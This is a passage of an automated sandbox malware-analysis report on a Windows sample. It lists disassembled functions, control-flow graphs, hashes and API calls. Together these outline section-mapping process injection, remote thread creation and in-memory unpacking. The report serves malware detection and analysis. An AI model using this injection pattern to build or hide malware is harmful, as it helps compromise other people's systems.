                                                                        • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64
                                                                        Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 279 4015e6-40160a call 401240 284 40160c 279->284 285 40160f-401614 279->285 284->285 287 40161a-40162b 285->287 288 40193e-401946 285->288 291 401631-40165a 287->291 292 40193c 287->292 288->285 293 40194b-40198e call 401240 288->293 291->292 300 401660-401677 NtDuplicateObject 291->300 292->293 300->292 302 40167d-4016a1 NtCreateSection 300->302 304 4016a3-4016c4 NtMapViewOfSection 302->304 305 4016fd-401723 NtCreateSection 302->305 304->305 309 4016c6-4016e2 NtMapViewOfSection 304->309 305->292 308 401729-40172d 305->308 308->292 312 401733-401754 NtMapViewOfSection 308->312 309->305 311 4016e4-4016fa 309->311 311->305 312->292 314 40175a-401776 NtMapViewOfSection 312->314 314->292 317 40177c 314->317 317->292 318 40177c call 401781 317->318 318->292
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: da093589d2d920786b053f62cd85dab4a028aa54c55a505f1a39e86dd67689ba
                                                                        • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                        • Opcode Fuzzy Hash: da093589d2d920786b053f62cd85dab4a028aa54c55a505f1a39e86dd67689ba
                                                                        • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64
                                                                        Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 319 403043-403067 320 40319a-40319f 319->320 321 40306d-403085 319->321 321->320 322 40308b-40309c 321->322 323 40309e-4030a7 322->323 324 4030ac-4030ba 323->324 324->324 325 4030bc-4030c3 324->325 326 4030e5-4030ec 325->326 327 4030c5-4030e4 325->327 328 40310e-403111 326->328 329 4030ee-40310d 326->329 327->326 330 403113-403116 328->330 331 40311a 328->331 329->328 330->331 332 403118 330->332 331->323 333 40311c-403121 331->333 332->333 333->320 334 403123-403126 333->334 334->320 335 403128-403197 RtlCreateUserThread NtTerminateProcess 334->335 335->320
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9
                                                                        Function 024E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 24e003c-24e0047 1 24e004c-24e0263 call 24e0a3f call 24e0e0f call 24e0d90 VirtualAlloc 0->1 2 24e0049 0->2 17 24e028b-24e0292 1->17 18 24e0265-24e0289 call 24e0a69 1->18 2->1 20 24e02a1-24e02b0 17->20 22 24e02ce-24e03c2 VirtualProtect call 24e0cce call 24e0ce7 18->22 20->22 23 24e02b2-24e02cc 20->23 29 24e03d1-24e03e0 22->29 23->20 30 24e0439-24e04b8 VirtualFree 29->30 31 24e03e2-24e0437 call 24e0ce7 29->31 33 24e04be-24e04cd 30->33 34 24e05f4-24e05fe 30->34 31->29 36 24e04d3-24e04dd 33->36 37 24e077f-24e0789 34->37 38 24e0604-24e060d 34->38 36->34 40 24e04e3-24e0505 36->40 41 24e078b-24e07a3 37->41 42 24e07a6-24e07b0 37->42 38->37 43 24e0613-24e0637 38->43 51 24e0517-24e0520 40->51 52 24e0507-24e0515 40->52 41->42 44 24e086e-24e08be LoadLibraryA 42->44 45 24e07b6-24e07cb 42->45 46 24e063e-24e0648 43->46 50 24e08c7-24e08f9 44->50 48 24e07d2-24e07d5 45->48 46->37 49 24e064e-24e065a 46->49 53 24e07d7-24e07e0 48->53 54 24e0824-24e0833 48->54 49->37 55 24e0660-24e066a 49->55 56 24e08fb-24e0901 50->56 57 24e0902-24e091d 50->57 58 24e0526-24e0547 51->58 52->58 59 24e07e4-24e0822 53->59 60 24e07e2 53->60 62 24e0839-24e083c 54->62 61 24e067a-24e0689 55->61 56->57 63 24e054d-24e0550 58->63 59->48 60->54 64 24e068f-24e06b2 61->64 65 24e0750-24e077a 61->65 62->44 66 24e083e-24e0847 62->66 72 24e0556-24e056b 63->72 73 24e05e0-24e05ef 63->73 67 24e06ef-24e06fc 64->67 68 24e06b4-24e06ed 64->68 65->46 69 24e084b-24e086c 66->69 70 24e0849 66->70 74 24e06fe-24e0748 67->74 75 24e074b 67->75 68->67 69->62 70->44 76 24e056f-24e057a 72->76 77 24e056d 72->77 73->36 74->75 75->61 80 24e057c-24e0599 76->80 81 24e059b-24e05bb 76->81 77->73 84 24e05bd-24e05db 80->84 81->84 84->63
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024E024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_24e0000_E647.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 0783c2768731fe3e8d9e8d57ada001befee56267019b85a16529305c8023ab95
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 76527A74A00229DFDB64CF58C984BADBBB1BF09305F1480DAE55EAB351DB70AA85CF14
                                                                        Function 0267F506 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 336 267f506-267f51f 337 267f521-267f523 336->337 338 267f525 337->338 339 267f52a-267f536 CreateToolhelp32Snapshot 337->339 338->339 340 267f546-267f553 Module32First 339->340 341 267f538-267f53e 339->341 342 267f555-267f556 call 267f1c5 340->342 343 267f55c-267f564 340->343 341->340 346 267f540-267f544 341->346 347 267f55b 342->347 346->337 346->340 347->343
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0267F52E
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0267F54E
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_266d000_E647.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 7e9eeba1dd67d6f10ae028d76bff47f4cac2a2936cb21c3dc6b6560ddcb2e3fc
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: 8AF06271100711ABE7303EF9E88DF6AB6E8AF59625F100629E642919C0DB70E9458A61
                                                                        Function 024E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 349 24e0e0f-24e0e24 SetErrorMode * 2 350 24e0e2b-24e0e2c 349->350 351 24e0e26 349->351 351->350
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,024E0223,?,?), ref: 024E0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,024E0223,?,?), ref: 024E0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_24e0000_E647.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 976d7545bf58b2575a6f5fc2ad6292d4e66bc1bcbf73e3e118de18fb1b373a76
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: B0D0123114512877DB003A94DC09BCE7B1CDF05B67F008021FB0DE9180C7B0954046E5
                                                                        Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 352 401991-4019ed call 401240 Sleep 364 4019f3-4019f5 352->364 365 4019ee call 4014c4 352->365 366 401a04-401a24 364->366 367 4019f7-4019ff call 4015b7 364->367 365->364 373 401a32 366->373 374 401a29-401a35 366->374 367->366 373->374 376 401a46 374->376 377 401a3a-401a52 call 401240 374->377 376->377
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: f786c9b48305f926c2fe9aa6a4a640c3689c3b4dd88574010f3490bae00a72b6
                                                                        • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                        • Opcode Fuzzy Hash: f786c9b48305f926c2fe9aa6a4a640c3689c3b4dd88574010f3490bae00a72b6
                                                                        • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF
                                                                        Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 381 4019a9-4019ed call 401240 Sleep 393 4019f3-4019f5 381->393 394 4019ee call 4014c4 381->394 395 401a04-401a24 393->395 396 4019f7-4019ff call 4015b7 393->396 394->393 402 401a32 395->402 403 401a29-401a35 395->403 396->395 402->403 405 401a46 403->405 406 401a3a-401a52 call 401240 403->406 405->406
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                        • Opcode Fuzzy Hash: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF
                                                                        Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 410 4019af-4019ed call 401240 Sleep 417 4019f3-4019f5 410->417 418 4019ee call 4014c4 410->418 419 401a04-401a24 417->419 420 4019f7-4019ff call 4015b7 417->420 418->417 426 401a32 419->426 427 401a29-401a35 419->427 420->419 426->427 429 401a46 427->429 430 401a3a-401a52 call 401240 427->430 429->430
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
                                                                        • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                        • Opcode Fuzzy Hash: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
                                                                        • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                                                        Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 434 4019b8-4019ed call 401240 Sleep 438 4019f3-4019f5 434->438 439 4019ee call 4014c4 434->439 440 401a04-401a24 438->440 441 4019f7-4019ff call 4015b7 438->441 439->438 447 401a32 440->447 448 401a29-401a35 440->448 441->440 447->448 450 401a46 448->450 451 401a3a-401a52 call 401240 448->451 450->451
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
                                                                        • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                        • Opcode Fuzzy Hash: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
                                                                        • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                        Function 0267F1C5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 455 267f1c5-267f1ff call 267f4d8 458 267f201-267f234 VirtualAlloc call 267f252 455->458 459 267f24d 455->459 461 267f239-267f24b 458->461 459->459 461->459
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0267F216
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_266d000_E647.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: fbb9baa782d1ca38b2fafafe134811812fee6eb86e773cd6243ff91d34a09328
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: A0113C79A00208EFDB01DF98C985E98BBF5AF08350F1580A4F9489B361D371EA90DF90

                                                                        Execution Graph

                                                                        Execution Coverage:6.3%
                                                                        Dynamic/Decrypted Code Coverage:43.3%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:120
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 4231 403043 4232 40319a 4231->4232 4233 40306d 4231->4233 4233->4232 4233->4233 4234 403128 RtlCreateUserThread NtTerminateProcess 4233->4234 4234->4232 4275 24a0001 4276 24a0005 4275->4276 4281 24a092b GetPEB 4276->4281 4278 24a0030 4283 24a003c 4278->4283 4282 24a0972 4281->4282 4282->4278 4284 24a0049 4283->4284 4285 24a0e0f 2 API calls 4284->4285 4286 24a0223 4285->4286 4287 24a0d90 GetPEB 4286->4287 4288 24a0238 VirtualAlloc 4287->4288 4289 24a0265 4288->4289 4290 24a02ce VirtualProtect 4289->4290 4292 24a030b 4290->4292 4291 24a0439 VirtualFree 4295 24a04be LoadLibraryA 4291->4295 4292->4291 4294 24a08c7 4295->4294 4296 24a0005 4297 24a092b GetPEB 4296->4297 4298 24a0030 4297->4298 4299 24a003c 7 API calls 4298->4299 4300 24a0038 4299->4300 4301 4014cf 4302 4014d3 4301->4302 4303 401660 NtDuplicateObject 4302->4303 4312 401571 4302->4312 4304 40167d NtCreateSection 4303->4304 4303->4312 4305 4016a3 NtMapViewOfSection 4304->4305 4306 4016fd NtCreateSection 4304->4306 4305->4306 4307 4016c6 NtMapViewOfSection 4305->4307 4308 401729 4306->4308 4306->4312 4307->4306 4309 4016e4 4307->4309 4310 401733 NtMapViewOfSection 4308->4310 4308->4312 4309->4306 4311 40175a NtMapViewOfSection 4310->4311 4310->4312 4311->4312 4216 25feb8e 4217 25feb9d 4216->4217 4220 25ff32e 4217->4220 4221 25ff349 4220->4221 4222 25ff352 CreateToolhelp32Snapshot 4221->4222 4223 25ff36e Module32First 4221->4223 4222->4221 4222->4223 4224 25ff37d 4223->4224 4225 25feba6 4223->4225 4227 25fefed 4224->4227 4228 25ff018 4227->4228 4229 25ff029 VirtualAlloc 4228->4229 4230 25ff061 4228->4230 4229->4230 4230->4230 4410 4015d5 4411 4015e4 4410->4411 4412 401660 NtDuplicateObject 4411->4412 4421 40177c 4411->4421 4413 40167d NtCreateSection 4412->4413 4412->4421 4414 4016a3 NtMapViewOfSection 4413->4414 4415 4016fd NtCreateSection 4413->4415 4414->4415 4416 4016c6 NtMapViewOfSection 4414->4416 4417 401729 4415->4417 4415->4421 4416->4415 4418 4016e4 4416->4418 4419 401733 NtMapViewOfSection 4417->4419 4417->4421 4418->4415 4420 40175a NtMapViewOfSection 4419->4420 4419->4421 4420->4421 4254 402f16 4256 402f1a 4254->4256 4255 402fa2 4256->4255 4258 401991 4256->4258 4259 4019a0 4258->4259 4260 4019d8 Sleep 4259->4260 4262 4019f3 4260->4262 4263 4014c4 4260->4263 4262->4255 4264 4014d3 4263->4264 4265 401660 NtDuplicateObject 4264->4265 4274 401571 4264->4274 4266 40167d NtCreateSection 4265->4266 4265->4274 4267 4016a3 NtMapViewOfSection 4266->4267 4268 4016fd NtCreateSection 4266->4268 4267->4268 4269 4016c6 NtMapViewOfSection 4267->4269 4270 401729 4268->4270 4268->4274 4269->4268 4271 4016e4 4269->4271 4272 401733 NtMapViewOfSection 4270->4272 4270->4274 4271->4268 4273 40175a NtMapViewOfSection 4272->4273 4272->4274 4273->4274 4274->4262 4373 402e9a 4374 402e5f 4373->4374 4375 402eaf 4373->4375 4376 402fa2 4375->4376 4377 401991 8 API calls 4375->4377 4377->4376 4473 25feb80 4474 25feb8e 4473->4474 4475 25ff32e 3 API calls 4474->4475 4476 25feba6 4475->4476 4325 402ee7 4326 402ef9 4325->4326 4327 401991 8 API calls 4326->4327 4328 402fa2 4326->4328 4327->4328 4477 4019a9 4478 4019a0 4477->4478 4479 4019d8 Sleep 4478->4479 4480 4014c4 7 API calls 4479->4480 4481 4019f3 4479->4481 4480->4481 4378 401373 4379 401381 VirtualProtect 4378->4379 4381 40133e 4379->4381 4382 401975 4383 401979 4382->4383 4384 4014c4 7 API calls 4383->4384 4385 4019f3 4384->4385 4235 24a003c 4236 24a0049 4235->4236 4248 24a0e0f SetErrorMode SetErrorMode 4236->4248 4241 24a0265 4242 24a02ce VirtualProtect 4241->4242 4244 24a030b 4242->4244 4243 24a0439 VirtualFree 4247 24a04be LoadLibraryA 4243->4247 4244->4243 4246 24a08c7 4247->4246 4249 24a0223 4248->4249 4250 24a0d90 4249->4250 4251 24a0dad 4250->4251 4252 24a0dbb GetPEB 4251->4252 4253 24a0238 VirtualAlloc 4251->4253 4252->4253 4253->4241

                                                                        Executed Functions

                                                                        Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 99 401547 97->99 100 4015bd-4015d4 97->100 98->91 101 40152a-401535 98->101 102 401596-4015a6 99->102 103 401549-40154b 99->103 101->96 105 401537-401543 101->105 106 4015a8 102->106 103->106 107 40154d-40156d 103->107 105->97 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 135 401660-401677 NtDuplicateObject 126->135 127->128 135->127 137 40167d-4016a1 NtCreateSection 135->137 140 4016a3-4016c4 NtMapViewOfSection 137->140 141 4016fd-401723 NtCreateSection 137->141 140->141 142 4016c6-4016e2 NtMapViewOfSection 140->142 141->127 144 401729-40172d 141->144 142->141 145 4016e4-4016fa 142->145 144->127 147 401733-401754 NtMapViewOfSection 144->147 145->141 147->127 149 40175a-401776 NtMapViewOfSection 147->149 149->127 152 40177c 149->152 152->127 153 40177c call 401781 152->153 153->127
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4cfe7beb35eebf88c645a46c10bdf16ef044b5e65f6e3ad60f9fe20b10e07c2
                                                                        • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                        • Opcode Fuzzy Hash: a4cfe7beb35eebf88c645a46c10bdf16ef044b5e65f6e3ad60f9fe20b10e07c2
                                                                        • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66
                                                                        Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 168 401631-40165a 164->168 169 40193c 164->169 165->162 170 40194b-40198e call 401240 165->170 168->169 177 401660-401677 NtDuplicateObject 168->177 169->170 177->169 179 40167d-4016a1 NtCreateSection 177->179 182 4016a3-4016c4 NtMapViewOfSection 179->182 183 4016fd-401723 NtCreateSection 179->183 182->183 184 4016c6-4016e2 NtMapViewOfSection 182->184 183->169 186 401729-40172d 183->186 184->183 187 4016e4-4016fa 184->187 186->169 189 401733-401754 NtMapViewOfSection 186->189 187->183 189->169 191 40175a-401776 NtMapViewOfSection 189->191 191->169 194 40177c 191->194 194->169 195 40177c call 401781 194->195 195->169
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: a048fff95c548b67d4af93e06dbb446bf3167c5580fcedad9e3c57286057ba63
                                                                        • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                        • Opcode Fuzzy Hash: a048fff95c548b67d4af93e06dbb446bf3167c5580fcedad9e3c57286057ba63
                                                                        • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64
                                                                        Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 196 4015df-4015e4 198 4015f4 196->198 199 4015eb-4015f0 196->199 198->199 200 4015f7-40160a call 401240 198->200 199->200 203 40160c 200->203 204 40160f-401614 200->204 203->204 206 40161a-40162b 204->206 207 40193e-401946 204->207 210 401631-40165a 206->210 211 40193c 206->211 207->204 212 40194b-40198e call 401240 207->212 210->211 219 401660-401677 NtDuplicateObject 210->219 211->212 219->211 221 40167d-4016a1 NtCreateSection 219->221 224 4016a3-4016c4 NtMapViewOfSection 221->224 225 4016fd-401723 NtCreateSection 221->225 224->225 226 4016c6-4016e2 NtMapViewOfSection 224->226 225->211 228 401729-40172d 225->228 226->225 229 4016e4-4016fa 226->229 228->211 231 401733-401754 NtMapViewOfSection 228->231 229->225 231->211 233 40175a-401776 NtMapViewOfSection 231->233 233->211 236 40177c 233->236 236->211 237 40177c call 401781 236->237 237->211
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
